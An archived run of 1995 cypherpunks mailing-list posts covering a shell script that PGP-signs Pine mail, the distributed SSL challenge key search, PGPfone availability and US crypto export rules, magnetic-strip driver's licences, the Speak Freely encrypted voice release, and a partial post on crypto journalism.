 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++) ULU++ P+ L++ E---- W+(-) N++++ o+ K+++ w---
O- M+ V-- PS++>$ PE++>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++
G+++++ e++ h r-- y++**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Fri, 25 Aug 95 19:17:18 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: PINESIGN 2.2 (re: PGP for Pine)
Message-ID: <Pine.ULT.3.91.950825211443.13100D-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I've been out of town this week, so I coulsn't respond in a timely manner 
(and I returned to 500+ pieces of cypherpunks email :-)

I'm appending a copy of PineSign 2.2, ehich is the most recent version of 
the PineSign program.  It doesn't do any encryption, it simple allows for 
easy signing of messages composed with pine (and maybe other mailers as 
well).  If you want to encrypt and such, I'd recommend mkpgp if you can 
find it or perhaps autopgp does it (not sure).

I also have a version of a similiar program for Tin available on my home 
page, or I can post it if there is interest.

=====

#!/bin/sh

# PINESIGN v2.2
# Written by:  Robert A. Hayden <hayden@krypton.mankato.msus.edu>

# PINESIGN is a simple program that will allow you to automatically sign 
# your email and news messages composed with the Pine 3.91 mail reader.  It 
# may also work with other mail and news programs, but it has not been 
# tested.

# INSTRUCTIONS FOR CONFIGURING PINE
# 
# You need to define the following options in Pine.  This can be done 
# either via the SETUP options in the main menu of Pine, or via editing 
# the .pinerc. 
#
# 	A)	signature-file=" "  (an empty space)
#	B)	enable-alternate-editor-cmd
#	C)	enable-alternate-editor-implicitly (optional but recommended)
#	D) 	signature-at-bottom
#	E)	editor=<exact path to this script>

# INSTRUCTIONS FOR CONFIGURING PINESIGN
#
# The PGP program must be in your path, and the PGPPATH environment 
# variable must be defined.  See the PGP documentation for details.
#
# Double check that the first line of this program points to sh. 
#
# In addition to PGP and the editor you define, PineSign also will use the
# following programs:
#       cat
#	clear
#       echo
#	mv
#
# Execute the command "chmod 700 <path/to/tinsign>"
#
# Edit the SIGPATH and PINEEDITOR variables to point at your signature 
# (if any) and the editor you wish to use for your Pine mail.  Default 
# signature will be the file .signature-pine in your $HOME directory.  
# Default editor is pico -z -t.
#
# Define SIGPATH=/dev/null if you do not have an ASCII signature to
# append.

SIGPATH=$HOME/.signature-pine
PINEEDITOR='pico -z -t'

# Next, define the ECHOTYPE variable.  Some systems do not allow the use 
# of the echo -n command.  If your system doesn't like echo -n, uncomment 
# the plain echo variable and comment out (put a "#" in front of it) the 
# echo -n commant.

ECHOTYPE='echo -n'
#ECHOTYPE='echo'

# INSTRUCTIONS FOR USING PINESIGN
#
# When you compose a message, you will compose your message as normal.  
#
# When you exit your editor (control-X in Pico), you will receive a prompt 
# asking if you wish to add your signature file to the message.  If you 
# respond with y, Y or just press return, your text signature file will 
# be appended to your message.  If you type anything else, your message 
# will not have your signature added.
#
# Next, you will be prompted as to whether you wish to PGP sign your
# message.  If you answer with y, Y or return, you will be prompted for your
# PGP passphrase and then dumped back to the address/subject section of
# Pine.  If you type anything else, your message will not be signed.  
#
# If you selected it to be added, your signature file will be appended 
# AFTER your digital signature. 
#
# If you have not defined your alternate editor to be run implicitly, you 
# will need to start it manually.  If you do not run the alternate editor,
# your signature file will not be appended and you will also have to do
# that manually.  It is highly recommended that your define your alternate
# editor to run implicitly. 

### DO NOT EDIT ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU ARE DOING ###

$PINEEDITOR $1

clear
$ECHOTYPE "Would you like to add your ASCII signature to this message? [y] " 
read SIG
echo " "
$ECHOTYPE "Would you like to sign this message with your PGP signature? [y] "
read PGP

if [ "$PGP" = "y" ]
	then 
		pgp -sat +comment="PGP Signed with PineSign 2.2" +clearsig=ON $1
		mv $1.asc $1
fi

if [ "$PGP" = "Y" ]
	then 
		pgp -sat +comment="PGP Signed with PineSign 2.2" +clearsig=ON $1
		mv $1.asc $1
fi

if [ "$PGP" = "" ]
	then 
		pgp -sat +comment="PGP Signed with PineSign 2.2" +clearsig=ON $1
		mv $1.asc $1
fi

if [ "$SIG" = "y" ]
	then 
		echo " " >> $1
		cat $SIGPATH >> $1
fi

if [ "$SIG" = "Y" ]
	then 
		echo " " >> $1
		cat $SIGPATH >> $1
fi

if [ "$SIG" = "" ]
	then 
		echo " " >> $1
		cat $SIGPATH >> $1
fi

# REVISION HISTORY

# 1.0 -	Original Release
# 2.0 - Added the ability to select whether or not to add the ASCII signature
# 2.1 - Forgot to add the +clearsig=on parameter to the PGP statements.  
#	OOPS!
# 2.2 - CURRENT RELEASE
#	After receiving complaints about some systems not being able to 
#	handle the -n parameter for echo, added in the ECHOTYPE variable.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMD5oFzokqlyVGmCFAQHW0AQAuw7BVRcAKGfi7Bk53KBoQnYPO0H+3Ubn
aMCiOx9lWU2CDCtBxYM3TyMtNCIrcLt9YV5kFqSLXAN4kpe3s+p2wko3PdL9JyZg
63h1Wl7HT7t/Q+yYhYrI3kazrHJj9Bhv/AZTVhicEHV89z0SadXq7dZKrIQX6H3t
0aVz5mmZ5+E=
=Tfxw
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++) ULU++ P+ L++ E---- W+(-) N++++ o+ K+++ w---
O- M+ V-- PS++>$ PE++>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++
G+++++ e++ h r-- y++**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Neal <dneal@usis.com>
Date: Fri, 25 Aug 95 19:41:46 PDT
To: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Subject: Re: Auto-pgp for pine/elm/tin (fwd)
In-Reply-To: <199508260212.UAA27830@nagina.cs.colorado.edu>
Message-ID: <Pine.BSI.3.91.950825211846.8551A-100000@usis.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 25 Aug 1995, Bryce Wilcox wrote:

> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> > I have PGP installed on my pc and if I want to 
> > use it, I can save the message in ascii, then upload it to the server 
> > where I have my Internet account, then mail it.
> 
> 
> I use PGP on every outgoing message and about 20% of incoming messages.  And
> I send/receive a *lot* of messages.  No way I would be able to do a process 
> like the above on my mail.
> 
> 
> In a few weeks I will be able to get mail on my home computer, but most
> (80%?) Internet users will still not have that luxury.

Is that assumption based on the fact that most inet users are using
shell accounts?  Using a PPP or SLIP dialup and managing your mail
locally using POP is pretty easy.  Clients like Private Idaho
and PGPclip then make the PGP transition painless.

Here at USIS, we have 305 entries in the password file.  Subtract
10 entries for system accounts (root, news, majordomo, bin, etc)
Now of the entries left 80 are PPP, 48 SLIP.  There are shell
accounts for each slip/ppp user, thus we have 39 people left over
who are shell only.  So, 70% of our users have the ability to locally
manage and pgp encrypt mail.

Now that winblows 95 is out and ppp dialup into the i-net
is point and gruntable, I expect this disparity to worsen.

Why learn icky unix commands when you can follow some simple
instructions and have ras up and running ppp in 10 minutes?
Since people will _already_ be using windows mail interfaces,
the transition to PGP wil be quick and painless.  Hell, I
hear the latest version of Eudora has it integrated.




David Neal <dneal@usis.com> - GNU Planet Aerospace 1-800-PLN-8-GNU
Unix, Sybase and Networking consultant. "...you have a personal responsibility 
to be pro-active in the defense of your own civil liberties." - S. McCandlish





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. R. Valverde (EMBL Outstation: the EBI)" <txomsy@ebi.ac.uk>
Date: Fri, 25 Aug 95 13:42:22 PDT
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Brute Squad [Re: SSL Challenge: Server problems]
In-Reply-To: <"swan.cl.cam.:226410:950825111043"@cl.cam.ac.uk>
Message-ID: <199508252041.VAA01686@neptune.ebi.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


I've had a power down and had to shutdown most machines. On coming back
decided to update the versions of brloop and brclient...

Now I'm trying to run on AXP/OSF/1 and MIPS/Ultrix machines the latest
versions and don't seem to be able to get a damn piece of keyspace...

Besides many timeouts I also get

Server timing problem: Goodbye unknown -- you have been timed out

which I assume is a message from the server telling me it's too loaded,
and

No input when expecting an ACK line

which sound even worst... I've been having trouble getting keys all the
afternoon now, what a pity.

BTW, the versions I'm running now are brloop 0.05 and brclient 0.16 and
since I'm in Cambridgeshire-UK too, with a 2Mbps link, I doubt that the
timeout is due to congestion on the net.

Any suggestions? Or is it only the overload in the server that's giving
me nightmares?

				jr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Date: Fri, 25 Aug 95 18:53:06 PDT
To: hfarkas@ims.advantis.com
Subject: Auto-pgp for pine/elm/tin (fwd)
Message-ID: <Pine.3.89.9508252137.H2413-0100000@wane3.scri.fsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



In Garfinkel's book, he talks about the risks of running PGP on a 
multiuser system where others (sys. admins, eg) have higher levels of 
authority than you do.  I have PGP installed on my pc and if I want to 
use it, I can save the message in ascii, then upload it to the server 
where I have my Internet account, then mail it.  maybe not entirely 
transparent, but at least it seems to me that the convenience of running 
it on the server with something like Mr. Wilcox's BAP is not worth the 
added risk.  Besides, how often do you need to use it?  
--
pjp

---------- Forwarded message ----------
Date: Fri, 25 Aug 1995 12:03:52 -0400 (EDT)
From: Henry W. Farkas <hfarkas@ims.advantis.com>
To: cypherpunks@toad.com
Subject: Auto-pgp for pine/elm/tin

-----BEGIN PGP SIGNED MESSAGE-----

> Does anyone know of an addon to the Pine mailer that supports PGP? 
> the only PGP software i could find required me to first compose a
> letter in an editor then run it through a pgp signature program
> then finally read it into my favorite mailer.
> 
> I'm looking for something that is hopefully transparent, or if not
> relatively quick to do.
> ________________________________________________________________________
> Sameer Manek                Seawolf@challenger.atc.fhda.edu         
> ________________________________________________________________________

- ------------------------------------------------------------------------

Yes, it exists, and I'm using it now.  I've tried competing products and 
found this to be the cleanest, smoothest and easiest to install.  I have 
no personal, commercial or financial interest in this product.   It does 
"auto-pgp" for pine, elm and tin.  

 ***********************************************************************
 *  BAP v.1.01                                                         *
 *  Written August 1995 by Bryce Wilcox                                * 
 *  e-mail: <bryce.wilcox@colorado.edu>                                *
 *  PGP key id: <617C6DB9>                                             *
 *  snail mail: <2228 Canyon Blvd, Apt. 1E, Boulder, CO, 80302>        *
 *  URL: <http://cs.colorado.edu/~wilcoxb/home.html>                   *
 *  BETA TEST VERSION!  DO NOT DISTRIBUTE!                             *
 * (Note that documentation, among other things, is still unfinished.) *
 ***********************************************************************

I also found the author responsive to my comments and suggestions.
Just please do *-NOT-* put your pass phrase in a cleartext file!

- ------------------------------------------------------------------------

===========================================================================
     Henry W. Farkas      |      Me?    Speak for IBM?    Fat chance.
 hfarkas@ims.advantis.com |------------------------------------------------  
   hfarkas@vnet.ibm.com   |     http://newstand.ims.advantis.com/henry
      henry@nhcc.com      |          http://www.nhcc.com/~henry 
- ---------------------------------------------------------------------------
PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52  B3 80 34 1C CE 38 EC 53
 Public key at: pgp-public-keys@pgp.mit.edu, and other popular key servers.
- ---------------------------------------------------------------------------
Brought to you by Henry's Hardware: Home of the Pretty Good Hack "We're not
  fast, but it's not bad, and we're cheaper than the guy down the street!"
===========================================================================



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMD30WaDthkLkvrK9AQF6sQP/fVen7ZI4DbgC14y+NPdZYOjaRQ9/jQNT
d4StD638OoBRkO7b8efiTd/rNULwuzSPKDiplKwRdE8Bboh4FdSWYvz6wfqgNJcd
D3imouQcEt+erjEC2H5haQyZwBHeNNR9mTYhkzoBt4+jMqsRCECduaExyHUOTWFj
euOkRqTJ0l4=
=2q74
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Fri, 25 Aug 95 14:02:25 PDT
To: "David K. Merriman" <merriman@arn.net>
Subject: Re: ssl challenge
In-Reply-To: <199508251929.OAA15415@arnet.arn.net>
Message-ID: <"swan.cl.cam.:178620:950825210158"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


>         > option to output results to a file (or files, so we can maintain
> local logging of results: ie, CHAL2a.dat, CHAL2b.dat, etc).

Done -- in brl0.06

The whole code runs without writing any files, so it defaults to /dev/null,
but you can point it whatre you like (e.g. logkeys=log-`uname -n`)

>         > a Windows 3.1 variant (or even win32s)

Not my area ....

> Maybe next challenge, we can pre-allocate keyspace based on the results of
> this one: look at how fast folks are reporting results, and allocate chunks
> of space accordingly (maybe based on an 8-hour 'cycle'). Sure take some of
> the load off the poor server :-)

It would seem reasonable to allocate say "2/3rds of what you scanned last time"
in advance ...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Fri, 25 Aug 95 14:52:29 PDT
To: "J. R. Valverde (EMBL Outstation: the EBI)" <txomsy@ebi.ac.uk>
Subject: Re: Cypherpunk Brute Squad [Re: SSL Challenge: Server problems]
In-Reply-To: <199508252041.VAA01686@neptune.ebi.ac.uk>
Message-ID: <"swan.cl.cam.:196070:950825215208"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> Server timing problem: Goodbye unknown -- you have been timed out
> which I assume is a message from the server telling me it's too loaded,

No -- it means that you were taking too long to respond, so it timed you out.

> No input when expecting an ACK line
> which sound even worst... I've been having trouble getting keys all the
> afternoon now, what a pity.

brclient -k failed to get any keys, so brutessl didn't generate any output,
so brclient -A didn't get any input :-(

Latest brloop should avoid this by not calling brutessl if brclient -k failed
and also not calling brclient -A if brutessl didn't run / failed.

> BTW, the versions I'm running now are brloop 0.05 and brclient 0.16 and
> since I'm in Cambridgeshire-UK too, with a 2Mbps link, I doubt that the
> timeout is due to congestion on the net.

Well, the problem with brclient 0.16 was that a "go faster" stripe made it
go *too* fast if local, perl losses data, so it times out :-((

> Any suggestions? Or is it only the overload in the server that's giving
> me nightmares?

Kind of -- slow clients hogging the single threaded (idle) server :-((




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@milliways.org  (Dan Bailey)
Date: Fri, 25 Aug 95 19:58:28 PDT
To: cypherpunks@toad.com
Subject: Auto-PGP for OS/2
Message-ID: <199508260258.AA11781@ibm.net>
MIME-Version: 1.0
Content-Type: text/plain



A few weeks ago, someone anonymously posted a uuencoded version of an
add-on to the OS/2 System Editor that claimed to automatically use PGP
to encrypt and/or sign ASCII documents.  However, when I uudecoded it
with several different versions of uudecode, all I got was garbage.  I
sent mail to the poster's anon.penet.fi address, but didn't get a
response.
	Did anyone manage to get a clean file or know where I can FTP it? 
Thanks.
					Dan
******************************************************************************
"I think, therefore I am" - Descartes                            Dan Bailey
"I don't think, therefore I'm a moustache." - Sartre		    dan@milliways.org
Worcester Polytechnic Institute and The Restaurant at the End of the Universe
******************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Fri, 25 Aug 95 14:55:24 PDT
To: cypherpunks@toad.com
Subject: Wide Release (Re: PGPfone (BETA TEST) is released)
Message-ID: <199508252155.XAA06116@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


ftp host: net-dist.mit.edu, AKA bitsy.mit.edu

220 bitsy FTP server (Version wu-2.4(1) Thu Apr 14 20:21:35 EDT 1994) ready.
USER ftp
331 Guest login ok, send your complete e-mail address as password.
PASS *****
230-Welcome, archive user!  This is an experimental FTP server.  If have any
230-unusual problems, please report them via e-mail to ftp-bugs@bitsy
230-If you do have problems, please try using a dash (-) as the first character
230-of your password -- this will turn off the continuation messages that may
230-be confusing your ftp client.
230-
230-Please read the file README
230-  it was last modified on Sat May 28 19:19:36 1988 - 2643 days ago
230 Guest login ok, access restrictions apply.
PWD
257 "/" is current directory.
MACB E
500 'MACB E': command not understood.
TYPE A
200 Type set to A.

CWD /pub/PGPfone
250-Please read the file README
250-  it was last modified on Fri Aug 25 15:52:05 1995 - 0 days ago
250 CWD command successful.
PORT 199,117,100,36,7,146
200 PORT command successful.
LIST
150 Opening ASCII mode data connection for /bin/ls.
total 29
-r--r--r--  1 0        1001         4287 Aug 25 15:52 README
drwxr-x---  4 1        27            512 Aug 25 17:00 dist
-r--r--r--  1 0        1001         2172 Aug 24 22:02 mitlicen.txt
-r--r--r--  1 0        1001        19546 Aug 24 23:43 rsalicen.txt
226 Transfer complete.

CWD /pub/PGPfone/dist
250 CWD command successful.
PORT 199,117,100,36,4,177
200 PORT command successful.
LIST
150 Opening ASCII mode data connection for /bin/ls.
total 2
drwxr-xr-x  2 435      27            512 Aug 25 15:24 U.S.-only-XXXX
drwxrwxr-x  2 0        27            512 Aug 25 15:13 secret99
226 Transfer complete.

CWD /pub/PGPfone/dist/secret99
250 CWD command successful.
PORT 199,117,100,36,7,178
200 PORT command successful.
LIST
150 Opening ASCII mode data connection for /bin/ls.
total 2271
-r--r--r--  1 0        27         764444 Aug 25 15:12 PGPfone10.sea.Hqx
-r--r--r--  1 0        27         751220 Aug 25 12:50 PGPfone10.sea.Hqx.OLD
-r--r--r--  1 0        27         750964 Aug 24 23:30 PGPfone10.sea.Hqx.OLDER
-r--r--r--  1 0        27           2172 Aug 24 22:02 mitlicen.txt
-r--r--r--  1 0        27          19546 Aug 24 23:43 rsalicen.txt
226 Transfer complete.

CWD /pub/PGPfone/dist/U.S.-only-XXXX
250 CWD command successful.
PORT 199,117,100,36,6,161
200 PORT command successful.
LIST
150 Opening ASCII mode data connection for /bin/ls.
total 760
-r--r--r--  1 0        27         764444 Aug 25 15:12 PGPfone10.sea.Hqx
226 Transfer complete.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolab@censored.org>
Date: Fri, 25 Aug 95 22:12:08 PDT
To: "Robert A. Rosenberg" <hal9001@panix.com>
Subject: Re: Florida Drivers Permits
In-Reply-To: <v02130506ac63e9ef8d55@[166.84.254.3]>
Message-ID: <Pine.BSI.3.91.950826000630.348B-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 26 Aug 1995, Robert A. Rosenberg wrote:

> At 13:10 8/25/95, Jim Ray wrote:
> >Story doesn't say it, but it sounds like FL *may* be the first state to do
> >this. Are any other states doing this already?
> 
> NY has Photo Drivers Permits with Mag Strips on the back and Computer
> Generated Pictures (I've even seen them being created when I was on an
> assignment at the DMV office in Albany that creates them).

Minnesota has now been doing this for over a year. There's been a lot of 
trouble with it, but they have them. Mine is do any day, and it will
certainly come in contact with a magnet, upon my possession.

Love Always,

Carol Anne

Member Internet Society - Certified BETSI Programmer - WWW Page Creation
-------------------------------------------------------------------------
Carol Anne Braddock         <--now running linux 1.0.9 for your pleasure
carolann@censored.org             __  __     ____  ___       ___ ____
carolab@primenet.com             /__)/__) / / / / /_  /\  / /_    /
carolb@spring.com               /   / \  / / / / /__ /  \/ /___  /
-------------------------------------------------------------------------
A great place to start
My Cyber Doc...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Fri, 25 Aug 95 22:00:17 PDT
To: liberty@gate.net (Jim Ray)
Subject: Re: Florida Drivers Permits
Message-ID: <v02130506ac63e9ef8d55@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 13:10 8/25/95, Jim Ray wrote:
>I saw the same story. The name, address, age, & height mentioned
>are already obvious on licenses, but this may preclude incorrect data entry
>by FL cops, and counterfeiting (a problem here for *years*). I saw nothing
>on the digitized photo, but we could be looking at different stories.
>Phase-in in July, '96. The story I saw suggests that other data, such as
>tickets, criminal violations (presumably convictions) and "other
>biographical information" [welfare, credit info] could eventually be
>included, depending on FL's state budgetary considerations. No author,
>just "Associated Press," listed on the story, and the card uses a magnetic
>strip "like those on credit cards" rather than a chip, which may be a
>mistake [considering the renewal period & my experience with bank-cards].
>Story doesn't say it, but it sounds like FL *may* be the first state to do
>this. Are any other states doing this already?

NY has Photo Drivers Permits with Mag Strips on the back and Computer
Generated Pictures (I've even seen them being created when I was on an
assignment at the DMV office in Albany that creates them).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Sat, 26 Aug 95 01:26:50 PDT
To: cypherpunks
Subject: John Walker releases encrypting Speak Freely/Netfone
Message-ID: <9508260826.AA11577@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


[John lives in Switzerland and renounced his US citizenship, so
there's no export issue...]

Date: Wed, 23 Aug 1995 07:14:10 -0400
Forwarded-by: farber@central.cis.upenn.edu (David Farber)

From: John Walker <kelvin@fourmilab.ch>
Subject: Free secure Internet voice communication

I've just released to the public domain Release 5 of Speak Freely for
Windows and its Unix counterpart, Netfone for Sun and Silicon Graphics
workstations.  Assuming you have a fast enough connection to the
Internet (with reasonably consistent packet delivery time) and/or a
fast enough CPU to perform audio compression in real time, you can
talk to anybody on Earth connected to the Internet who's also running
the program.  The Windows and Unix versions have entirely different
user interfaces, but can intercommunicate.  Complete source code is
available.

For communications security, IDEA, DES (less initial and final
permutations), and one-time pad (re-used for each sound packet)
encryption are available.  The intensely paranoid can enable any
combination of these.  The documentation explains how to use PGP to
securely exchange session keys before a conversation; an automatic
session key generator is provided.  DES is included for commercial
users who don't have a license to use the IDEA patent.  One-time pad
encryption is for those with machines too slow to run IDEA or DES in
real time.

I didn't include a public key mechanism because I wanted to avoid all
the confusion.  If somebody wants to navigate the narrow strait
between the RSA patent Scylla and Charybdis of export controls, the
programming work to implement public keys is straightforward and the
source code is yours to hack.

For further information, see:

    http://www.fourmilab.ch/netfone/windows/speak_freely.html

which describes the Windows version in detail and contains pointers to
the Sun and SGI editions, as well as links to download source code and
a ready-to-run executable for Windows.  You can also obtain the
program by anonymous binary FTP:

Unix source code:
    ftp://ftp.fourmilab.ch/pub/kelvin/netfone/netfone5.tar.gz

Windows executable:
    ftp://ftp.fourmilab.ch/pub/kelvin/netfone/windows/speakfb.zip

Windows source code (for Visual C 1.5):
    ftp://ftp.fourmilab.ch/pub/kelvin/netfone/windows/speakfs.zip

The Sun and SGI versions of this program are quite stable, and should
work for just about anybody with an adequate network connection.
Porting the code to other Unix workstations with audio hardware should
be relatively straightforward.  The Windows version has just been
finished and until it's shaken down on a variety of machines,
networks, sound cards, etc. may not work for everybody.

The Windows version requires a sound card with Windows Multimedia
drivers (I've tested it on a variety of Sound Blasters of various
generations) and a TCP/IP stack that supports WINSOCK (I'm using
NetManage Chameleon NFS).  Since multimedia and network hardware and
drivers vary tremendously from machine to machine, I wouldn't be
surprised if some tweaking were needed for various configurations.
The CPU speed required interacts with the speed of your network
connection; if you have a high-bandwidth connection to the Internet,
or you're talking to another person on a high-speed LAN, there's no
need to compress sound and the CPU load is minimal; just about any
machine will do.  If you need to compress in order to squeeze 8000
samples per second into a dial-up connection, then you need a CPU fast
enough to run GSM compression in real time: basically we're talking a
very fast 486 or Pentium.  If you turn on IDEA and/or DES encryption,
that also consumes CPU time.

Based on my experience with other Windows programs, it will probably
take months to track down misbehaviour due to strange hardware and
software configurations.  Complete, detailed bug reports are welcome.
I may not be able to respond individually, but the Web page will track
updates as they're released.  I have tested the program only on
vanilla 16 bit Windows 3.1.

The Windows version contains preliminary code to support direct
dial-up modem connections, acting as a phone scrambler.  Serial port
support in most Windows machines is so poor (unless you have a 16550A
UART and appropriate drivers, which most people don't) that this
feature isn't usable at present.  I've left the code in just in case
somebody with suitable hardware wants to bash it into working form.

If you add features, port the program to 32 bits, fix bugs, etc., let
me know so I can make your contributions generally available.

--------------------  <http://www.fourmilab.ch/>  -------------------
John Walker                      | A sufficiently advanced
Internet: kelvin@fourmilab.ch    | technology is indistinguishable
                                 | from a rigged demo.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Snyder <rsnyder@janet.advsys.com>
Date: Sat, 26 Aug 95 04:28:52 PDT
To: cypherpunks@toad.com
Subject: Re: Wide Release (Re: PGPfone (BETA TEST) is released)
In-Reply-To: <199508252155.XAA06116@utopia.hacktic.nl>
Message-ID: <199508261129.HAA22154@janet.advsys.com>
MIME-Version: 1.0
Content-Type: text/plain


> ftp host: net-dist.mit.edu, AKA bitsy.mit.edu
> 
> 220 bitsy FTP server (Version wu-2.4(1) Thu Apr 14 20:21:35 EDT 1994) ready.
> USER ftp
> 331 Guest login ok, send your complete e-mail address as password.
> PASS *****

The fact that it uses exactly 5 *'s, and the MACB E command below indicate 
this was probably an Anarchie transcript, a ftp/archie client for the Mac.

> PWD
> 257 "/" is current directory.
> MACB E
> 500 'MACB E': command not understood.
> TYPE A
> 200 Type set to A.
> 
> CWD /pub/PGPfone
> 250-Please read the file README
> 250-  it was last modified on Fri Aug 25 15:52:05 1995 - 0 days ago
> 250 CWD command successful.
> PORT 199,117,100,36,7,146

Too bad "Anonymous" isn't more aware of the FTP protocol.  This indicates that 
the connection was made from 199.117.100.36, p36.Boulder-2.dialup.csn.net.

> 200 PORT command successful.
> LIST
> 150 Opening ASCII mode data connection for /bin/ls.
> total 29
> -r--r--r--  1 0        1001         4287 Aug 25 15:52 README
> drwxr-x---  4 1        27            512 Aug 25 17:00 dist
> -r--r--r--  1 0        1001         2172 Aug 24 22:02 mitlicen.txt
> -r--r--r--  1 0        1001        19546 Aug 24 23:43 rsalicen.txt
> 226 Transfer complete.
> 
> CWD /pub/PGPfone/dist
> 250 CWD command successful.

This indicates "Anonymous" is either making up everything from this point on, 
or has access to the machine other than normal anonymous FTP.  The permissions 
on dist would prevent the CWD from happening.  Actually, the permissions on 
dist prevent this from working at all.

Look, if you want to make PGPfone available overseas in violation of ITAR, go 
ahead.  It's a stupid law, and you aren't likely to get caught.  But don't 
make MIT or Phil the fall guy for it.  Send it out yourself.  MIT and Phil 
have contributed greatly to the privacy community, and stupid stunts like this 
aren't going to encourage them much.

Bob





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Snyder <rsnyder@janet.advsys.com>
Date: Sat, 26 Aug 95 06:49:02 PDT
To: cypherpunks@toad.com
Subject: Re: Wide Release (Re: PGPfone (BETA TEST) is released)
In-Reply-To: <m0smKvJ-000PZgC@bofh.lake.de>
Message-ID: <199508261349.JAA23170@janet.advsys.com>
MIME-Version: 1.0
Content-Type: text/plain


cg@bofh.lake.de said:
> > This indicates "Anonymous" is either making up everything from this 
> point on,  or has access to the machine other than normal anonymous 
> FTP.  The permissions  on dist would prevent the CWD from happening.  
> Actually, the permissions on  dist prevent this from working at all.  
> Wrong. The FTP daemon probably has a wrapper around it which checks 
> where the call comes from. When it thinks you come from the U.S. or 
> Canada, it probably starts up the FTP daemon in group 27, otherwise 
> in the default anonymous group. The idea is nice, but you have to 
> implement it correctly, of course. 

You appear to be correct.  I came in from a .net address, which MIT apparently 
feels is non-US, and they would be correct about some .net's, but that's true 
of .com and .edu as well.

I came in from a Multinational corporation in .com, and it let me in. :-)

> That's the dillema: if you export it, you are taking the 
> risk they won't put up this kind of software for FTP the next time. 
> If you don't, you are  complying with these stupid laws... But 
> anyway, with the present state of the MIT FTP server, PGPfone is 
> likely to be all over the (non-US-and-Canada) place before the 
> weekend is over. 

But if people get it from MIT directly, then MIT is violating ITAR/DTR, and 
its lawyers would be justified in shutting things down.  If it's pulled down 
by a US citizen, and then sent out, I don't see how MIT could be held 
responsible for it.

Bob





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 26 Aug 95 10:21:21 PDT
To: Peter F Cassidy <cypherpunks@toad.com
Subject: Modern Journalism (was: All about Bernstein)
Message-ID: <ac649c1e01021004bebc@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


I've never met either Dan Bernstein or Peter Cassidy, but this raises an
issue of slight relevance to the themes of this list, at least the nexus of
publicity and journalism issues. You folks may have different views of this
trend toward journalistic puff pieces. As crypto issues reach public
visibility, and as things like the SSL breakage get reported, and as
digital money efforts reach fruition, I expect a lot more journalistic
coverage.

Sadly, I also expect most of the articles to be in the vein of the many
repetitive articles about Phil Zimmermann.

"The Soul of a New Journalist" meets "Manufacturing Drama" (apologies to
Kidder and Chomsky).

At 10:56 AM 8/25/95, Peter F Cassidy wrote:
>Folks,
>
>I'm the guy who authored an upcoming piece about Bernstein's law suit
>with the state department for WIRED. WIRED loves the piece but, in the
>style of popular mags, wants more personal stuff on Bernstein, who is
>super articulate about the science and law of crypto but super shy about
>his heroic self. (Guy wouldn't even disclose his age! Had to threaten to
>throw myself in front of a bus to get him to tell me he's from Long
>Island!) Editor thinks guy comes across as a ghost, not surpisingly. . .
>
>One fellow from the list, following up an appeal I made here for Friends
